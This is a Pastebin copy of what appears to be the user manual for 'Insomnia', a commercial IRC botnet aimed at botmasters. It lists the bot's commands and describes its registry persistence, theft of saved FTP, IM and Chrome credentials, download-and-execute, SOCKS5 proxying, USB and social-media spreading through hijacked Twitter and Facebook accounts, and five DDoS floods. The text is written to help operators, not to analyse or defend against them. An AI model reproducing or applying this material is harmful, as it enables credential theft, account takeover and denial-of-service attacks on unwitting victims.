daily pastebin goal


a guest Dec 22nd, 2012 58 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  2.     Table of Contents
  4.     1. Summary
  5.     2. Core Features
  6.     3. Malware Removal
  7.     4. SOCKS5
  8.     5. DDoS
  9.     6. Spreading Modules
  10.     7. Topic Generator Explained
  11.     8. Complete command list
  13.     Summary
  15.     Insomnia was developed in Visual Studio 2010 using the C# language. The binary is
  16.     compiled under the 2.0 distribution of the .NET Framework. Insomnia was primarily
  17.     designed for the botmaster who plans to build a network with machines that have the
  18.     .NET framework installed. During development, the infection of newer operating
  19.     systems was considered, and Insomnia is fully compatible with Windows 8 Development
  20.     Preview at this time, and should work fine on the release builds.
  22.     Insomnia has been tested to function on Windows NT based operating systems,
  23.     specifically the following:
  25.     Windows XP
  26.     Windows Server 2003 / R2
  27.     Windows Vista
  28.     Windows Server 2008 / R2
  29.     Windows 7
  30.     Windows 8 Development Preview
  32.     If Insomnia acquires administrative rights on the target machine, it will install to
  33.     HKLM rather than HKCU, allowing it to be executed under all user accounts on the
  34.     machine. It will also make use of specific Windows API calls that only function under
  35.     elevated permissions, improving the functionality of some malware removal features
  36.     such as Ruskill.
  38.     Upon execution, Insomnia gathers it’s country location from http://api.wipmania.com.
  39.     If for some reason this website can’t be accessed, Insomnia will default to system
  40.     locale information.
  42.     Insomnia’s nick generation pattern is based on a series of information. Here is a
  43.     breakdown:
  45.     n{US|XP-32a}dnskifj
  47.     The lowercase ‘n’ in the nick signifies that Insomnia has recently been
  48.     installed within the past hour, implying that it is most likely a new
  49.     installation.
  50.     The next part is the GeoIP location of the PC Insomnia is running on. US being
  51.     United States.
  52.     This is followed by the version of windows (Windows XP 32 bit), and the
  53.     lowercase ‘a’ signifies that the bot is running with administrative
  54.     privileges. If the bot is only running as a standard user, it will show a
  55.     lowercase ‘u’ instead.
  56.     The rest of the nick is made up of seven randomly generated characters to
  57.     avoid nick collision.
  59.     Core Features
  61.     Connection Information
  63.     Insomnia supports the IRC protocol along with SSL (Secure-Socket-Layer) connections.
  64.     SSL is recommended, as the downside to normal IRC connections is that they are easily
  65.     recognized. Using normal connections can put Insomnia at risk of detection, while
  66.     exposing information that is exchanged on your network.
  68.     Insomnia may be compiled to support connections to multiple servers at request. There
  69.     is no limit at this time.
  71.     Quit Messages
  73.     IRC quit messages are decided by listening to WM_QUERYENDSESSION. This lets insomnia
  74.     include the reason the process is terminating, if it is related to a Windows session
  75.     attempting to close. If the bot process is terminated abnormally or fails to acquire
  76.     a reason, it will be the standard ‚Connection reset by peer‛. Currently Insomnia
  77.     detects and outputs three types of quit messages:
  79.     Windows is shutting down…
  80.     Windows is logging off…
  81.     Windows is going to sleep…
  83.     Registry Persistence
  85.     Insomnia actively monitors the registry for changes, by pinvoking a series of Windows
  86.     API functions such as RegNotifyKeyChangeValue. If it finds out that its registry key
  87.     was modified or deleted, it will fix it immediately.
  89.     Core command list
  91.     These commands signify features that are found in the basic compile of Insomnia, and
  92.     are included in every binary available for purchase, without the addition of separate
  93.     modules.
  95.     Command
  96.     .v
  97.     .m on/off
  98.     .avinfo
  99.     .j #channel
  100.     .p #channel
  101.     .sort
  102.     .unsort
  103.     .permsort
  104.     .rm
  105.     .rc
  106.     .ftp
  107.     .im
  108.     .read URL
  109.     .open FILE/URL
  110.     .open FILE/URL –h
  111.     .dl URL
  112.     .dl URL –m
  113.     .dl URL –t X
  115.     The rest of the commands are discussed in their appropriate sections below. You can find a
  116.     complete command list on the very last page of this document.
  118.     Description
  119.     Outputs version, MD5 hash, process path, registry location.
  120.     Toggles mute (blocks all output).
  121.     Display current Antivirus/Firewall programs installed. (Vista+)
  122.     Joins a channel.
  123.     Parts a channel.
  124.     Sorts bots into channels based on their country. (#US, #RU, etc).
  125.     Parts the sorted channels.
  126.     Sorts the bots based on privileges. (#users/#admins).
  127.     Completely removes Insomnia from the machine.
  128.     Reconnects to IRC after waiting 10 seconds.
  129.     Outputs saved FTP credentials on the machine.
  130.     Outputs saved IM credentials on the machine.
  131.     Reads encrypted topic commands from a remote URL
  132.     Opens a URL or file on machine.
  133.     Opens a URL or file on the machine but hides the window.
  134.     Downloads a file and executes it.
  135.     Downloads a file and executes it in memory (.NET files only)
  136.     Downloads a file and terminates after X seconds have passed.
  138.     Malware Removal
  140.     Botkiller
  142.     Insomnia includes two types of malware removal commands. Those are as follows:
  144.     Description
  145.     Runs the standard botkiller module.
  146.     Runs the botkiller module that terminates injected bots.
  148.     The standard botkiller module works around a counter system. It first scans temporary
  149.     folders, including %APPDATA% for any executable files that are currently running. It
  150.     then checks if the files have a ‚hidden‛ attribute or not. Other checks are then
  151.     performed including checking the registry startup locations. If an executable program
  152.     violates a certain number of these checks, it’s safe to consider it ‚possibly
  153.     malicious‛, and Insomnia will then terminate it, delete the registry key, and output
  154.     and TCP connections associated with that process.
  156.     The botkiller module that terminates injected bots uses a series of techniques to
  157.     remove nearly all bots that inject into explorer/iexplore.
  159.     Both of these commands perform different actions. If you want to give the best effort
  160.     to clean a system from other common malware, it’s recommended you run both of these
  161.     commands.
  163.     Command
  164.     .dl URL -r
  166.     Description
  167.     Starts the download and initiates the Ruskill module on the file.
  169.     Ruskill is initiated by calling the download function with the ‘r’ parameter.
  171.     Files downloaded with Ruskill enabled will be monitored and information will be
  172.     outputted to the Ruskill channel.
  174.     Ruskill attempts to discover all files dropped by that malware along with all
  175.     registry keys created, and then reverse those changes the next time the PC reboots.
  176.     It uses a set of Windows API calls to make this possible, deleting target files after
  177.     AUTOCHK but before Windows creates any page files. Administrative rights can affect
  178.     how well this feature works.
  180.     Ruskill uses API calls similar to those in ngrBot/Autumn/Other Antivirus/File
  181.     Assassin software.
  183.     DDoS Functionality
  185.     Insomnia includes five different methods to initiate distributed denial of service
  186.     attacks. Two methods are primarily aimed at exploiting vulnerabilities in the Apache
  187.     web server, by consuming all sockets and resources.
  189.     While initiating a DDoS command, insomnia will stop all other active DDoS threads
  190.     before starting. This helps allocate threads for the new DDoS command while not
  191.     consuming too many resources client-side, and saturating the upstream (which may
  192.     cause the bot to disconnect temporarily).
  194.     Command
  195.     .arme HOST TIME
  196.     .slow HOST TIME
  197.     .layer4 HOST PORT TIME
  198.     .layer7 HOST PORT TIME
  199.     .udp HOST PORT TIME
  201.     Description
  202.     Multithreaded
  203.     Multithreaded
  204.     Multithreaded
  205.     Multithreaded
  206.     Multithreaded
  208.     Apache Remote Memory Exhaustion flood.
  209.     Slowloris Flood
  210.     Layer4 (SYN) Flood
  211.     Layer7 (HTTP GET) Flood
  212.     UDP Flood
  214.     ARME (Apache Remote Memory Exhaustion)
  216.     This method was discovered in late 2011 and is a modified port of the perl script by
  217.     Kingcope. Running this with enough connections can actually cause Apache to swap
  218.     memory to file system after RAM is consumed, and may result in the process being
  219.     terminated as the host system becomes unstable. Higher-end servers or properly
  220.     modified/configured Apache installations may not be vulnerable.
  222.     Slowloris
  224.     This method was developed by RSNAKE and made popular in 2009. This C# port works in
  225.     the exact same way but with random user agents, random content length, and random
  226.     header data so it's even harder to block from the host machine. It also uses GET and
  227.     POST to do the attack which seems to have better results than sticking with just one
  228.     method. Slowloris can take a while to consume all the sockets on the host machine,
  229.     but it always wins in the end.
  231.     This method simply does an HTTP GET request on the index page, and downloads the page
  232.     data. Works good in high numbers. If you are focusing attacks on Apache webservers
  233.     with small numbers, then the methods above are recommended.
  235.     This method uses SynSockets to flood the server with TCP connections. It's not too
  236.     hard to block server-side and is an older method, but if a server is vulnerable then
  237.     it's highly effective.
  239.     This flood is ideal for neighborhood connections or larger servers if you have the
  240.     manpower to do it, flooding with UDP packets containing random data.
  242.     SOCKS5 Module
  244.     Description
  245.     Attempts to start the SOCKS5 server and report back with results.
  247.     This command will signal Insomnia to start the SOCKS5 server and attempt to test it’s
  248.     connection. If everything worked out with no errors, it will output the IP:PORT
  249.     USER:PASS to IRC so you are able to use them. It also attempts to map ports with the
  250.     included uPnP library. If it succeeds it will signify it in the output.
  252.     <n{US|W7-64u}dnsmdks> [SOCKS]: Attempting to start SOCKS server…
  253.     <n{US|W7-64u}dnsmdks> [SOCKS]: Listening on [] [user:pass] [uPnP=yes]
  255.     Spreaders
  257.     USB .LNK Spread
  259.     This module runs automatically. Upon initial bot execution it scans for USB Removable
  260.     Media. When found, it scans the drive for folders, creating appropriate LNK files and
  261.     hiding the originals. It also listens for new devices and infects them as they are
  262.     added. This module will output to IRC after a successful infection.
  264.     <n{US|W7-64u}dnsmdks> [USB]: Completed LNK spread on (G:\) with 7 files.
  266.     Twitter
  268.     Command
  269.     .twitter “msg”
  271.     This module queries the chrome grabber for accounts that fit twitter.com, and
  272.     attempts to login. If the login was a success, it proceeds to update the status to
  273.     the specified message. This does NOT use the Twitter API and does NOT require OAuth.
  274.     It simulates the http web requests made by a real browser to login to twitter and
  275.     update the status.
  277.     <n{US|W7-64u}dnsmdks> [TWITTER]: Status updated. (user@email.com => ‚msg‛ )
  279.     Description
  280.     Updates twitter status on the system.
  282.     Facebook
  284.     Command
  285.     .facebook “msg”
  287.     This module queries the chrome grabber for accounts that fit facebook.com, and
  288.     attempts to login. If the login was a success, it proceeds to gather information
  289.     about the Facebook account required to login to the Facebook chat system via the XMPP
  290.     protocol. Once the data is acquired, resources are disposed of and a chat session is
  291.     initiated with the user's credentials. Once the module has access to the chat system,
  292.     it will begin to send the message you provided with the given options.
  294.     You can specify to send to only online/offline friends with the parameters above. You
  295.     can also specify to send to a certain number of friends (the friends will be randomly
  296.     chosen), by using the –f parameter followed by a number of your choice.
  298.     <n{US|W7-64u}dnsmdks> [FACEBOOK]: Spreader module started. (user@email.com => ‚msg‛)
  300.     Description
  301.     Starts facebook spread module with specified message.
  303.     Topic Generator
  305.     Insomnia comes with a topic generation utility to help you secure your topic commands
  306.     from prying eyes, and simplify commands that should be performed in sequential order.
  308.     To use, please run the topic generator that was included with your purchase. Each
  309.     customer gets a topic generator that encrypts based on your unique customer ID, so no
  310.     one else with the topic generator could interact with your binary, compiled with the
  311.     same customer ID.
  313.     To use the Topic Generator, simply type in the commands exactly how you would in IRC,
  314.     then click Add. The topic generator will add them to the listview, automatically
  315.     parsing and detecting the parameters.
  317.     When you are all finished, click Generate, and use the topic in IRC. If a topic is
  318.     too big for the IRC topic character limit, you can host the encrypted commands and
  319.     set the topic to the encrypted version of .read http://yoururl.com/commands.txt
  321.     Complete Command List
  323.     .m on/off
  324.     .avinfo
  326.     .j #channel
  327.     .p #channel
  328.     .sort
  330.     .unsort
  331.     .permsort
  332.     .rm
  333.     .rc
  334.     .ftp
  335.     .im
  336.     .read URL
  337.     .open FILE/URL
  338.     .open FILE/URL –h
  339.     .dl URL
  340.     .dl URL –m
  342.     .dl URL –t X
  344.     .dl URL –r
  346.     .socks
  347.     .speedtest URL
  348.     .bk
  349.     .bk –i
  350.     .getadmin
  352.     .acc keyword
  354.     .arme HOST TIME
  355.     .slow HOST TIME
  356.     .layer4 HOST PORT TIME
  357.     .layer7 HOST PORT TIME
  358.     .udp HOST PORT TIME
  360.     Description
  361.     Outputs version, MD5 hash, process path, registry
  362.     location.
  363.     Toggles mute (blocks all output).
  364.     Display current Antivirus/Firewall programs installed.
  365.     (Vista+)
  366.     Joins a channel.
  367.     Parts a channel.
  368.     Sorts bots into channels based on their country. (#US,
  369.     #RU, etc).
  370.     Parts the sorted channels.
  371.     Sorts the bots based on privileges. (#users/#admins).
  372.     Completely removes Insomnia from the machine.
  373.     Reconnects to IRC after waiting 10 seconds.
  374.     Outputs saved FTP credentials on the machine.
  375.     Outputs saved IM credentials on the machine.
  376.     Reads encrypted topic commands from a remote URL
  377.     Opens a URL or file on machine.
  378.     Opens a URL or file on the machine but hides the window.
  379.     Downloads a file and executes it.
  380.     Downloads a file and executes it in memory (.NET files
  381.     only)
  382.     Downloads a file and terminates after X seconds have
  383.     passed.
  384.     Downloads a file with Ruskill and outputs to Ruskill
  385.     channel.
  386.     Attempts to start SOCKS5 server
  387.     Download the URL and output speed information.
  388.     Standard botkiller module
  389.     Injected botkiller module
  390.     Added by request. Prompts UAC for admin, if acquires,
  391.     restarts.
  392.     Chrome grabber based on url keyword. Leave keyword blank
  393.     for all.
  394.     Multithreaded Apache Remote Memory Exhaustion flood.
  395.     Multithreaded Slowloris Flood
  396.     Multithreaded Layer4 (SYN) Flood
  397.     Multithreaded Layer7 (HTTP GET) Flood
  398.     Multithreaded UDP Flood
RAW Paste Data